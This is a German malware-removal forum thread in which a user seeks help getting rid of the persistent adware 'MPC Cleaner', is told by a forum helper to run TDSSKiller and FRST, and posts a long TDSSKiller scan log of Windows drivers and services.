| |
| |||||||
Log-Analyse und Auswertung: MPC Cleaner lässt sich nicht löschen (Maleware)Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
28.03.2016, 23:13
| #1 |
 |  MPC Cleaner lässt sich nicht löschen (Maleware) Hallo an die freundlichen Helfer, ich habe schon mit unterschiedlichen Tools (ADW Cleaner, Avira, Malewarebytes und "händisches" löschen der Add-Ons in allen Browsern etc.) versucht, den MPC Cleaner los zu werden - leider erfolglos. Nach dem Neustart taucht das Programm immer wieder auf, der Ordner im Dateimanager lässt sich auf Grund angeblich fehlender Berechtigungen nicht löschen. Mein "kleines" PC-Latein ist damit am Ende. Logfiles, Scans etc. habe ich beigefügt. Ich hoffe auf eure Hilfe, denn ich weiß so langsam nicht mehr weiter. Vielen Dank vorab. |
|
29.03.2016, 02:25
| #2 |
| /// Malwareteam   | MPC Cleaner lässt sich nicht löschen (Maleware) Mein Name ist Rafael und ich werde dir bei der Bereinigung helfen. Damit ich dir optimal helfen kann, halte dich bitte an folgende Regeln:
 Da gibt’s definitiv was zu tun... Hinweis: Dein PC zeigt deutliche Zeichen einer Infektion. Schritt: 1 Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
Schritt: 2 Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen. Bitte poste in deiner nächsten Antwort also:
Bitte poste dein Ergebnis zwischen Code-Tags Wenn ein Log zu lange ist, teile ihn bitte auf mehrere Antworten.  Code-Tags?Drücke einfach die # in Antwortfenster und füge den Log dazwischen ein 
__________________ Geändert von burningice (29.03.2016 um 02:34 Uhr) |
|
29.03.2016, 12:12
| #3 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) Hallo Rafael,
__________________vielen Dnak schon mal für die schnelle Antwort. Hier der erste Teil meiner Ergebnisse: TDSSKiller: Code:
ATTFilter 12:52:00.0609 0x1f48 TDSS rootkit removing tool 3.1.0.9 Dec 11 2015 22:49:12
12:52:00.0609 0x1f48 UEFI system
12:52:04.0125 0x1f48 ============================================================
12:52:04.0125 0x1f48 Current date / time: 2016/03/29 12:52:04.0125
12:52:04.0125 0x1f48 SystemInfo:
12:52:04.0125 0x1f48
12:52:04.0125 0x1f48 OS Version: 6.3.9600 ServicePack: 0.0
12:52:04.0125 0x1f48 Product type: Workstation
12:52:04.0125 0x1f48 ComputerName: SCHNEIDER
12:52:04.0125 0x1f48 UserName: Denny
12:52:04.0125 0x1f48 Windows directory: C:\WINDOWS
12:52:04.0125 0x1f48 System windows directory: C:\WINDOWS
12:52:04.0125 0x1f48 Running under WOW64
12:52:04.0125 0x1f48 Processor architecture: Intel x64
12:52:04.0125 0x1f48 Number of processors: 4
12:52:04.0125 0x1f48 Page size: 0x1000
12:52:04.0125 0x1f48 Boot type: Normal boot
12:52:04.0125 0x1f48 ============================================================
12:52:05.0469 0x1f48 KLMD registered as C:\WINDOWS\system32\drivers\40972326.sys
12:52:05.0781 0x1f48 System UUID: {5B1510C6-4A0B-6544-9997-F2AFE75DA464}
12:52:06.0453 0x1f48 Drive \Device\Harddisk0\DR0 - Size: 0x7470C06000 ( 465.76 Gb ), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
12:52:06.0469 0x1f48 ============================================================
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0:
12:52:06.0469 0x1f48 GPT partitions:
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0\Partition1: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {146106C0-853B-4743-B119-A5F4B4284CB2}, Name: Basic data partition, StartLBA 0x800, BlocksNum 0xC8000
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0\Partition2: GPT, TypeGUID: {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}, UniqueGUID: {81C455E2-8818-436F-B3FD-811ADCD15C2D}, Name: EFI system partition, StartLBA 0xC8800, BlocksNum 0x96000
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0\Partition3: GPT, TypeGUID: {E3C9E316-0B5C-4DB8-817D-F92DF00215AE}, UniqueGUID: {ABF6B76D-AC9A-4FC1-9EC0-4B223002BE86}, Name: Microsoft reserved partition, StartLBA 0x15E800, BlocksNum 0x40000
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0\Partition4: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {B2C77CC4-4871-44C2-ADBD-5AF23F6B4818}, Name: Basic data partition, StartLBA 0x19E800, BlocksNum 0x38238800
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0\Partition5: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {DCB566B6-3A81-4187-A578-18902FC3701E}, Name: , StartLBA 0x383D7000, BlocksNum 0xAF000
12:52:06.0469 0x1f48 \Device\Harddisk0\DR0\Partition6: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {24F6B656-CFF9-4055-B861-C0E29F5148CB}, Name: Basic data partition, StartLBA 0x38486000, BlocksNum 0x1F00000
12:52:06.0469 0x1f48 MBR partitions:
12:52:06.0469 0x1f48 ============================================================
12:52:06.0500 0x1f48 C: <-> \Device\Harddisk0\DR0\Partition4
12:52:06.0500 0x1f48 ============================================================
12:52:06.0500 0x1f48 Initialize success
12:52:06.0500 0x1f48 ============================================================
12:54:22.0804 0x1004 ============================================================
12:54:22.0804 0x1004 Scan started
12:54:22.0804 0x1004 Mode: Manual; SigCheck; TDLFS;
12:54:22.0804 0x1004 ============================================================
12:54:22.0804 0x1004 KSN ping started
12:54:25.0179 0x1004 KSN ping finished: true
12:54:30.0976 0x1004 ================ Scan system memory ========================
12:54:30.0976 0x1004 System memory - ok
12:54:30.0976 0x1004 ================ Scan services =============================
12:54:31.0117 0x1004 [ E1832BD9FD7E0FC2DC9FA5935DE3E8C1, 41FF7418887AFC8B9C96EF21C5950DD342CC9E3C0D87AFD60A05B988C1D6CC23 ] 1394ohci C:\WINDOWS\System32\drivers\1394ohci.sys
12:54:31.0242 0x1004 1394ohci - ok
12:54:31.0242 0x1004 [ AD508A1A46EC21B740AB31C28EFDFDB1, 9B1046CF0B80723149BD359B55CC0B8B3ABBEAA9038469F542A4C345C503FB02 ] 3ware C:\WINDOWS\system32\drivers\3ware.sys
12:54:31.0257 0x1004 3ware - ok
12:54:31.0320 0x1004 [ E796AE43DDD1844281DB4D57294D17C0, 21AE69615044A96041E46476BE814B52C22624B6C7EA6BFC77BB64F69C3C21F5 ] ACPI C:\WINDOWS\system32\drivers\ACPI.sys
12:54:31.0351 0x1004 ACPI - ok
12:54:31.0367 0x1004 [ AC8279D229398BCF05C3154ADCA86813, 083E86CBE53244D24C334DB1511C77025133AE7875191845764B890A8CA5AFA9 ] acpiex C:\WINDOWS\system32\Drivers\acpiex.sys
12:54:31.0382 0x1004 acpiex - ok
12:54:31.0413 0x1004 [ A8970D9BF23CD309E0403978A1B58F3F, 9946C8477104EEC7DB197E2222F9905307F101C398CCED4B5FD0F86A5622C791 ] acpipagr C:\WINDOWS\System32\drivers\acpipagr.sys
12:54:31.0460 0x1004 acpipagr - ok
12:54:31.0492 0x1004 [ 111A89C99C5B4F1A7BCE5F643DD86F65, 41A2E49FF443927D05F7EF638518108227852984E68D4663C8761178C0B84A45 ] AcpiPmi C:\WINDOWS\System32\drivers\acpipmi.sys
12:54:31.0539 0x1004 AcpiPmi - ok
12:54:31.0554 0x1004 [ 5758387D68A20AE7D3245011B07E36E7, 77832E200E8B0D259552F6F60FE454A887E3EBBB9EA2F3590E6645289A04E293 ] acpitime C:\WINDOWS\System32\drivers\acpitime.sys
12:54:31.0585 0x1004 acpitime - ok
12:54:31.0726 0x1004 [ 6F87D122342EA80DBECA387D7AE1CB6F, 3911E36C3895450F65FA31B7F8747E16F7804C748B0C6DDEF59DF83B4F5EE246 ] AdobeActiveFileMonitor13.0 C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe
12:54:31.0742 0x1004 AdobeActiveFileMonitor13.0 - ok
12:54:31.0804 0x1004 [ 011BD8A49AF856E8A8EE32652D1CFC05, 7E45CD5ED185DFCA94069640C19D3079879FD1F3069873D0302ACC372F756F90 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
12:54:31.0820 0x1004 AdobeFlashPlayerUpdateSvc - ok
12:54:31.0945 0x1004 [ 7C1FDF1B48298CBA7CE4BDD4978951AD, 80F4D536E1231B30E836F72ADC8814AE6AA9FEC573FB5F3F965FAC8ABCCAF0F8 ] ADP80XX C:\WINDOWS\system32\drivers\ADP80XX.SYS
12:54:31.0992 0x1004 ADP80XX - ok
12:54:32.0023 0x1004 [ BCD58DACAA1EAAADC115EDD940478F6D, F31613F583C302F62A00E6766B031531C9E193CAED563689B178BA257715B992 ] AeLookupSvc C:\WINDOWS\System32\aelupsvc.dll
12:54:32.0070 0x1004 AeLookupSvc - ok
12:54:32.0117 0x1004 [ A460C3AF3755A2A79A3C8EFE72E147B5, 62CEA85DA53D86D3E7B5D79F94095C6126FFF3DEE1427BBF3DEF5EA366B4513B ] AFD C:\WINDOWS\system32\drivers\afd.sys
12:54:32.0195 0x1004 AFD - ok
12:54:32.0226 0x1004 [ 7DFAEBA9AD62D20102B576D5CAC45EC8, 9FA5207335303D1E8E9A3C9E1FB82C09AD21B04382F69D777A67E48EE91D2093 ] agp440 C:\WINDOWS\system32\drivers\agp440.sys
12:54:32.0242 0x1004 agp440 - ok
12:54:32.0273 0x1004 [ FE14D249D39368CA62D8DA6BC94AC694, E1036E22BFBD3750FD2D3DA6AB939B2DD54E824F4BD3E6539EF0E45AB5453DD1 ] ahcache C:\WINDOWS\system32\DRIVERS\ahcache.sys
12:54:32.0335 0x1004 ahcache - ok
12:54:32.0351 0x1004 [ 14A45BE6F5678339F0EC5752D9849410, DD0F60E96FAC68FBD5B86382E541408C613BD0F871D0E0A1EF9AB6E7B26E545C ] ALG C:\WINDOWS\System32\alg.exe
12:54:32.0414 0x1004 ALG - ok
12:54:32.0414 0x1004 [ 7589DE749DB6F71A68489DCE04158729, 5F35EDD50737985595C9D6703237CA2ADE49AA5443331020899698EB5114A0FB ] AmdK8 C:\WINDOWS\System32\drivers\amdk8.sys
12:54:32.0445 0x1004 AmdK8 - ok
12:54:32.0460 0x1004 [ B46D2D89AFF8A9490FA8C98C7A5616E3, BE0765B5423B690E0F097FECD9717FAA95BFDFFDC6CF1B93DE5A19A1B7797879 ] AmdPPM C:\WINDOWS\System32\drivers\amdppm.sys
12:54:32.0492 0x1004 AmdPPM - ok
12:54:32.0507 0x1004 [ D2BF2F94A47D332814910FD47C6BBCD2, FE273D77D119D958676E1197D9EA7B008E3B05C6192B1962A81D4223ED204C35 ] amdsata C:\WINDOWS\system32\drivers\amdsata.sys
12:54:32.0507 0x1004 amdsata - ok
12:54:32.0539 0x1004 [ A8E04943C7BBA7219AA50400272C3C6E, 794C0BD12DF0392654E9A37AE4A24B5BE2D83F1F24F74DD48A1A0BF3AB8B1FF8 ] amdsbs C:\WINDOWS\system32\drivers\amdsbs.sys
12:54:32.0554 0x1004 amdsbs - ok
12:54:32.0554 0x1004 [ CEA5F4F27CFC08E3A44D576811B35F50, 89DF64B81BD109BAABAE93A4603C1617241219F38DDAF325EFE6BD35FF6FD717 ] amdxata C:\WINDOWS\system32\drivers\amdxata.sys
12:54:32.0570 0x1004 amdxata - ok
12:54:32.0867 0x1004 [ 37CD9EB03B36D8329F96BA921470DB54, 0CD3BFBA51F84D83E3B208D2BED7CE8E91B447B2037014663EC7CB8E5A925201 ] AntiVirMailService C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe
12:54:32.0945 0x1004 AntiVirMailService - ok
12:54:33.0007 0x1004 [ 98C06275DB53A1E70AB8CB94013B20D4, 5DE48C829A66B0F4C8119E75D985D63C1020FA318696BD19E44E0A07CD6F1ED0 ] AntiVirSchedulerService C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
12:54:33.0023 0x1004 AntiVirSchedulerService - ok
12:54:33.0070 0x1004 [ 98C06275DB53A1E70AB8CB94013B20D4, 5DE48C829A66B0F4C8119E75D985D63C1020FA318696BD19E44E0A07CD6F1ED0 ] AntiVirService C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
12:54:33.0085 0x1004 AntiVirService - ok
12:54:33.0164 0x1004 [ 1F5CC3C23E10290A3FF9CAA74AA30D07, A4F1F3465A5E0A914EE5A4FEF4A6B639956BA04B7145EF68820BC2A15DEE4162 ] AntiVirWebService C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe
12:54:33.0210 0x1004 AntiVirWebService - ok
12:54:33.0242 0x1004 [ 415DD71628795197F7AFC176CBADC74E, 5F0359053A6CD6EE239139E0E6F46E1FA9A73F017C0CE9B7BC052216B2C846EC ] AppID C:\WINDOWS\system32\drivers\appid.sys
12:54:33.0320 0x1004 AppID - ok
12:54:33.0351 0x1004 [ 88358135810B9DFD830A9D3A8C3D149A, DF914DA3828EE2310895D156342E3B3DF5E8C6F6F9B851C359E82A1F48180D4B ] AppIDSvc C:\WINDOWS\System32\appidsvc.dll
12:54:33.0382 0x1004 AppIDSvc - ok
12:54:33.0414 0x1004 [ 680BFB820C5A943AB709BAA2B1EF27F2, A51D2A7976A762FE470C13C6D1BA0319A0FB19C9E66BF02AA44F83EAEC7130F8 ] Appinfo C:\WINDOWS\System32\appinfo.dll
12:54:33.0476 0x1004 Appinfo - ok
12:54:33.0523 0x1004 [ 35E28923A23ADABAA5A1B43256D0AB58, A5F3AF8BBEE58B2165BAFACC5FF8B167B55B020998D3D1565C2229ED8753B269 ] AppReadiness C:\WINDOWS\system32\AppReadiness.dll
12:54:33.0570 0x1004 AppReadiness - ok
12:54:33.0664 0x1004 [ 573542B5E97772021B73E854DA861DAA, C3FD00FA28060F8D7CDFD455BBB5FF8239CB76DDFFF2BDAE6AA944674DD993D3 ] AppXSvc C:\WINDOWS\system32\appxdeploymentserver.dll
12:54:33.0757 0x1004 AppXSvc - ok
12:54:33.0789 0x1004 [ 65045784366F7EC5FB4E71BCF923187B, 53C215C64FF12E44B097F7CB88E8482438CE0ACBD3C68D8FD38BA0D0D8747FAA ] arcsas C:\WINDOWS\system32\drivers\arcsas.sys
12:54:33.0804 0x1004 arcsas - ok
12:54:33.0867 0x1004 Arygnarj - ok
12:54:33.0882 0x1004 [ 3DB7721F06BC2FEDB25029EA23AB27DA, 221861148C66FE53E4D6EE49C6E656479AB5804A2D348A280A1CD8093E8AB788 ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
12:54:33.0929 0x1004 AsyncMac - ok
12:54:33.0960 0x1004 [ 74B14192CF79A72F7536B27CB8814FBD, 0CF6BBB63FFE0C12777664D80B2797923844C8392D0FD81D7962EE5EE2C3C3D9 ] atapi C:\WINDOWS\system32\drivers\atapi.sys
12:54:33.0960 0x1004 atapi - ok
12:54:34.0007 0x1004 [ 1E71A166547A110CD66EA44326DB4552, F66502ACBB50760EB0A676CB2560A539511935F016CBA2747C554F709D3FA1FE ] AthBTPort C:\WINDOWS\system32\DRIVERS\btath_flt.sys
12:54:34.0023 0x1004 AthBTPort - ok
12:54:34.0085 0x1004 [ 7395FB31E3D1AA09EC5DBE6CE2FFE1D8, 7CD6D7A32C2C9B96B9320662C8B36C3089627A6699C7709153E30F9A79D9B7FD ] AtherosSvc C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe
12:54:34.0101 0x1004 AtherosSvc - detected UnsignedFile.Multi.Generic ( 1 )
12:54:36.0289 0x1f88 Object required for P2P: [ 37CD9EB03B36D8329F96BA921470DB54 ] AntiVirMailService
12:54:36.0570 0x1004 Detect skipped due to KSN trusted
12:54:36.0570 0x1004 AtherosSvc - ok
12:54:36.0711 0x1004 [ 2C7676F892E88FD190F08D98048C7C6C, 44C13C103F61DA4D1A3823D37344F8C9465A611A9560808CE928925FB69604F7 ] athr C:\WINDOWS\system32\DRIVERS\athw8x.sys
12:54:36.0898 0x1004 athr - ok
12:54:36.0945 0x1004 [ 431FE56F5A2F5937994CB2DA330B47DB, E5AED551529A21494114959251FDF566802DD6D9B9D86A937A0EECE53338CAC7 ] AudioEndpointBuilder C:\WINDOWS\System32\AudioEndpointBuilder.dll
12:54:37.0023 0x1004 AudioEndpointBuilder - ok
12:54:37.0054 0x1004 [ 0F03CC00645D7F841879A048787D6AC7, 3ECD2486157469F2EDB63D4868338D1445F2909153DF0AFFE432083730EEE3F5 ] Audiosrv C:\WINDOWS\System32\Audiosrv.dll
12:54:37.0101 0x1004 Audiosrv - ok
12:54:37.0148 0x1004 [ 5CF5E80616F74B769AABCF76FEA791D1, CA56643D41DB4E139FE85098DCD67187AAC126CE2414276364A97334E15F9F53 ] avgntflt C:\WINDOWS\system32\DRIVERS\avgntflt.sys
12:54:37.0164 0x1004 avgntflt - ok
12:54:37.0211 0x1004 [ 8AC3D6C2E2B0B22E918817A96DA4875E, AE6FB86A09373918DD7FA7E19DA9B2915AAAE6DDF5939245F44B5512E3710E1B ] avipbb C:\WINDOWS\system32\DRIVERS\avipbb.sys
12:54:37.0211 0x1004 avipbb - ok
12:54:37.0242 0x1004 [ 79F7741A773FF194EEC64A8161AE26D5, 3DDEA5FBDCB74A2BACC895A44C8C2A947F09E2649ED61D781E99DD61DBFACA5D ] avkmgr C:\WINDOWS\system32\DRIVERS\avkmgr.sys
12:54:37.0242 0x1004 avkmgr - ok
12:54:37.0273 0x1004 [ 02488D56FE0DB002CE3B1E120A0ED889, 487067731C2CA1BA8A1CF1C403C2342C153E6BE0CE9B003D914D9647059EFDBD ] avnetflt C:\WINDOWS\system32\DRIVERS\avnetflt.sys
12:54:37.0289 0x1004 avnetflt - ok
12:54:37.0320 0x1004 [ 3C6ED74AF41DD1A5585CE5EF3D00915F, A742F576407776634E5A8E49C60023FFDF395DE0B2DE36662A23F85B79405ED2 ] AxInstSV C:\WINDOWS\System32\AxInstSV.dll
12:54:37.0383 0x1004 AxInstSV - ok
12:54:37.0414 0x1004 [ A4A73F631FE2AA2826FBE4A399B04DEF, 973AACE8DC8DA669D0DF20F17EFDEEABB90AA046AC980948D16A62D39A606A79 ] b06bdrv C:\WINDOWS\system32\drivers\bxvbda.sys
12:54:37.0445 0x1004 b06bdrv - ok
12:54:37.0492 0x1004 [ 8CC7F7E4AFCBA605921B137ED7992C68, 71406E6D6E9964740A6D90B05329D5492BB90AF40E0630CF2FBF4BA4BA14F2DD ] BasicDisplay C:\WINDOWS\System32\drivers\BasicDisplay.sys
12:54:37.0711 0x1004 BasicDisplay - ok
12:54:37.0758 0x1004 [ 38A82F4EE8C416A6744B6D30381ED768, 9EAAE5F43BA09359130AC04B1DCA0F5D4DF32ED89C02DC5CEB640918948847F7 ] BasicRender C:\WINDOWS\System32\drivers\BasicRender.sys
12:54:37.0804 0x1004 BasicRender - ok
12:54:37.0820 0x1004 [ C1ABB0F7E3BEA48A0417BDF6FF14AB21, 1CAC63A1A0FB9855A27EE977794576A860F6650C9EF7667FFB27F2A2FF721857 ] bcmfn2 C:\WINDOWS\System32\drivers\bcmfn2.sys
12:54:37.0836 0x1004 bcmfn2 - ok
12:54:37.0883 0x1004 [ 4B6F61BD394DCEDA9B06D702836531C2, 83C739467BD9A00FE09BCE83BB9409EA2DA62FCDD2384F9EE98626226223E918 ] BDESVC C:\WINDOWS\System32\bdesvc.dll
12:54:37.0945 0x1004 BDESVC - ok
12:54:37.0976 0x1004 [ EC19013E4CF87609534165DF897274D6, 8ED45537CF2D58D759A587CCBFDADD5580C7447B0C3B172CF19ECC7585E073FC ] Beep C:\WINDOWS\system32\drivers\Beep.sys
12:54:38.0023 0x1004 Beep - ok
12:54:38.0070 0x1004 [ 8F2AD111B47A190F325EE7495D3C1803, C61F1506E74A9EFBB61B8A06B30886B6E891C33211F755F30B924EBA202ECEC5 ] BFE C:\WINDOWS\System32\bfe.dll
12:54:38.0148 0x1004 BFE - ok
12:54:38.0195 0x1004 [ 48554994279BFE17A3D2B00076D0CB1A, 6521B1EC0BC6B01F63976370D89FE7DC2E7404899F68B6FAC37A9173B9C5D489 ] BITS C:\WINDOWS\System32\qmgr.dll
12:54:38.0273 0x1004 BITS - ok
12:54:38.0289 0x1004 [ 6B4FFFDDC618FCF64473CAA86E305697, 29EA66071D5822920F5C50533673ADAB5204F8B25C11027AD27450D881F1142D ] bowser C:\WINDOWS\system32\DRIVERS\bowser.sys
12:54:38.0320 0x1004 bowser - ok
12:54:38.0367 0x1004 [ FA601515FF2B59F25FDD8EDB1D2A1104, 21DFB53241F8E880F7546B9ADF38F47D6AD0782EC7F8F0284ED69DE7CEF7DCB9 ] BrokerInfrastructure C:\WINDOWS\System32\bisrv.dll
12:54:38.0414 0x1004 BrokerInfrastructure - ok
12:54:38.0461 0x1004 [ BC111AADACD0BF59D56547461D13AB6E, 91E3619930C29EE4B2683683888BA7EE3CF6B1DDB0C19A14E0880470CBE40EF4 ] Browser C:\WINDOWS\System32\browser.dll
12:54:38.0492 0x1004 Browser - ok
12:54:38.0539 0x1004 [ C8DD6CF775A7587333EBC74D383E2AC9, 9961196EE1E7A4F54CBE2A4C53A9A1B4243E3C2B3D4C4224A7A87B326E63CEDE ] BTATH_A2DP C:\WINDOWS\system32\drivers\btath_a2dp.sys
12:54:38.0554 0x1004 BTATH_A2DP - ok
12:54:38.0554 0x1004 [ E54B63E59E66EE813AC974CF499DC55D, E08E180FC2172D7D75E7995F3E36229D63A51B0ED393D994AC608CD77E8D2160 ] btath_avdt C:\WINDOWS\system32\drivers\btath_avdt.sys
12:54:38.0570 0x1004 btath_avdt - ok
12:54:38.0617 0x1004 [ 4AF7C20F94DAC343C01ED671C82DCB99, 2AABD85D9D76461DE883E0F13F61C391BA81E6198FF88268B319474E25A196C8 ] BTATH_HCRP C:\WINDOWS\System32\drivers\btath_hcrp.sys
12:54:38.0633 0x1004 BTATH_HCRP - ok
12:54:38.0633 0x1004 [ 785C38070043BEEE9E9D591DE4067244, 1C8D15B8A9E80A2799E7094C4AE111FEA9FBC6EAA4A61B13EFE59314C9794949 ] BTATH_LWFLT C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys
12:54:38.0648 0x1004 BTATH_LWFLT - ok
12:54:38.0648 0x1004 [ A6019537D6125099363F90D0C6D181F9, CA0C46AABBF71E2A29C93A477A06D33E3CACC84978DD9D729BEFB339E50D7055 ] BTATH_RCP C:\WINDOWS\System32\drivers\btath_rcp.sys
12:54:38.0664 0x1004 BTATH_RCP - ok
12:54:38.0711 0x1004 [ 239A81CC18170F3369D389DA65E74342, 5E26976176A6651B149784B1ED86ECCA133B7755EBB8B04361A8DDB705767AA3 ] BtFilter C:\WINDOWS\system32\DRIVERS\btfilter.sys
12:54:38.0758 0x1004 BtFilter - ok
12:54:38.0773 0x1f88 Object send P2P result: true
12:54:38.0789 0x1004 [ A8F23D453A424FF4DE04989C4727ECC7, AE4A9081395C7379F1C947EF8243F7609F90C843E086B8E77E1A2C06E36D4381 ] BthAvrcpTg C:\WINDOWS\System32\drivers\BthAvrcpTg.sys
12:54:38.0820 0x1004 BthAvrcpTg - ok
12:54:38.0851 0x1004 [ 1104A31260CCF4318C884E0AE6C513BF, A8F83B558944DEF0F84414A11DC3CB90C3A92377B46760EC0A9B8BC22FB0D5C7 ] BthEnum C:\WINDOWS\System32\drivers\BthEnum.sys
12:54:38.0914 0x1004 BthEnum - ok
12:54:38.0929 0x1004 [ 272A62B660A48AEF366F8A1836CED19F, 78EFAC6B1B2313482329BBFFBF0DDA6462BD88E5BE3C817C5E8E0EAF3074C925 ] BthHFEnum C:\WINDOWS\System32\drivers\bthhfenum.sys
12:54:38.0961 0x1004 BthHFEnum - ok
12:54:39.0008 0x1004 [ 71FE2A48E4C93DDB9798C024880B6C07, 8E93DE29C61A5FA64216231228CB3C4A1A693FE87CAA2C070BCAD7BE2D8ED000 ] bthhfhid C:\WINDOWS\System32\drivers\BthHFHid.sys
12:54:39.0055 0x1004 bthhfhid - ok
12:54:39.0101 0x1004 [ 9307A4B743D277C499CDA8E19E5687AC, 7A01989EC3D54581F292BDEDC9B9445F2ABD50165102617E3089BDD061C63A19 ] BthHFSrv C:\WINDOWS\System32\BthHFSrv.dll
12:54:39.0133 0x1004 BthHFSrv - ok
12:54:39.0180 0x1004 [ D30C67473A2E229662D21F27EAA9AAA5, D009C4836B0DFE963D8E3DEEDE611068838F2BBCAB146E6D70692FAB838E11F1 ] BthLEEnum C:\WINDOWS\System32\drivers\BthLEEnum.sys
12:54:39.0226 0x1004 BthLEEnum - ok
12:54:39.0242 0x1004 [ 07E33226AD218A2A162662A05CAFB52F, 0AC3D8B79EDA6DA232FA4E1CAF6592420A9EDE96350D1F0504C2434261684F0B ] BTHMODEM C:\WINDOWS\System32\drivers\bthmodem.sys
12:54:39.0273 0x1004 BTHMODEM - ok
12:54:39.0320 0x1004 [ FEA8FC81431AD93F44D5FBFBBF096AA7, C0581DF6B2AD24836604B083F4866F93A3F4D9091D382029948A5E6221EDF788 ] BthPan C:\WINDOWS\System32\drivers\bthpan.sys
12:54:39.0351 0x1004 BthPan - ok
12:54:39.0398 0x1004 [ 0CC00ADC1B84C93FB46E1A0974E956E1, 64C759244651B916901F4D0C82C3D6034532A20714A72FD26FC9D050B99E230B ] BTHPORT C:\WINDOWS\System32\Drivers\BTHport.sys
12:54:39.0492 0x1004 BTHPORT - ok
12:54:39.0539 0x1004 [ 043A0F37631BF453F16D478B71320F46, C368296B802984F438852927B8A40EA3F4205724A05828F3173F08EC17228356 ] bthserv C:\WINDOWS\system32\bthserv.dll
12:54:39.0570 0x1004 bthserv - ok
12:54:39.0617 0x1004 [ 08EA90955AED2D959EE67DF6EDF0E2B6, 0A70AA67E5DD24C473C66A570C0FEBA9D398A0F0AD8386FE05D01C4D16346968 ] BTHUSB C:\WINDOWS\System32\Drivers\BTHUSB.sys
12:54:39.0648 0x1004 BTHUSB - ok
12:54:39.0789 0x1004 [ D2C6DB5CA609AAC89B80C9A092E5DEAB, 2244188153DCE0DB9D2613F3F1774D9C7BB735EF9F9CEB7F640B43171D914803 ] CCDMonitorService C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe
12:54:39.0945 0x1004 CCDMonitorService - ok
12:54:39.0976 0x1004 [ 2FA6510E33F7DEFEC03658B74101A9B9, 61C8C8E3F09B427711464C974EE22E1E01C48E10DB54A4EC9901F482FC36C978 ] cdfs C:\WINDOWS\system32\DRIVERS\cdfs.sys
12:54:40.0008 0x1004 cdfs - ok
12:54:40.0023 0x1004 [ C6796EA22B513E3457514D92DCDB1A3D, 2B893F3950C6B913B934C2089B69F3B0B77F229AE1820907E598455CBB78139C ] cdrom C:\WINDOWS\System32\drivers\cdrom.sys
12:54:40.0039 0x1004 cdrom - ok
12:54:40.0101 0x1004 [ 41C0D7B1A6D4AD119BA6AC0487EA5C8E, 516C2B34BA7507D0DA4148B4ABC0A8C36286570D4EA5C60B28647B1249C15018 ] CertPropSvc C:\WINDOWS\System32\certprop.dll
12:54:40.0164 0x1004 CertPropSvc - ok
12:54:40.0195 0x1004 [ BE9936EDD3267FAAFF94A7835867F00B, 3CEEF2377D45ED38C7CD3CE4C746EC5EA7277EFEC728A5438F0EF5F62FC7C859 ] circlass C:\WINDOWS\System32\drivers\circlass.sys
12:54:40.0226 0x1004 circlass - ok
12:54:40.0242 0x1004 [ 8EB7E70C2D348FE2476A2E3F2D585E3D, 2B5D407FACF1D049261026CC552A7C93B028A661B0F4E959815EAE7670054127 ] CLFS C:\WINDOWS\system32\drivers\CLFS.sys
12:54:40.0273 0x1004 CLFS - ok
12:54:40.0289 0x1004 [ EF6EF85DADC3184A10D8F2F7159973CB, 42FCB286CED95A5DEBC5C0C894FCBC4818A2C818BB71087142FB51A08A0BE96B ] CmBatt C:\WINDOWS\System32\drivers\CmBatt.sys
12:54:40.0351 0x1004 CmBatt - ok
12:54:40.0398 0x1004 [ 0DE32A0BB1FE2A773666572F79584520, C417C12476B937265BEDC9A2C3C3F6C50FD19AEC096362337B0921627A2A92EA ] CNG C:\WINDOWS\system32\Drivers\cng.sys
12:54:40.0430 0x1004 CNG - ok
12:54:40.0445 0x1004 [ 03AAED827C36F35D70900558B8274905, 8E44A23C6013FFAE7769F99CAA3B1D6288DE00A38937F9056903AC265B503AFA ] CompositeBus C:\WINDOWS\System32\drivers\CompositeBus.sys
12:54:40.0476 0x1004 CompositeBus - ok
12:54:40.0476 0x1004 COMSysApp - ok
12:54:40.0492 0x1004 [ A1FF7DFBFBE164CF92603C651D304DD2, 470ACE5A75E64FC62C950037201199857E974803625DC73BEDBCF6FA4DDD496C ] condrv C:\WINDOWS\system32\drivers\condrv.sys
12:54:40.0508 0x1004 condrv - ok
12:54:40.0570 0x1004 [ D8724B606616B2B75AF54096119580F5, 53E1DEF9F966FDE5898759A33FB62B5062A941E97B235D6F6EF79A5AD1283BDE ] cphs C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
12:54:40.0617 0x1004 cphs - ok
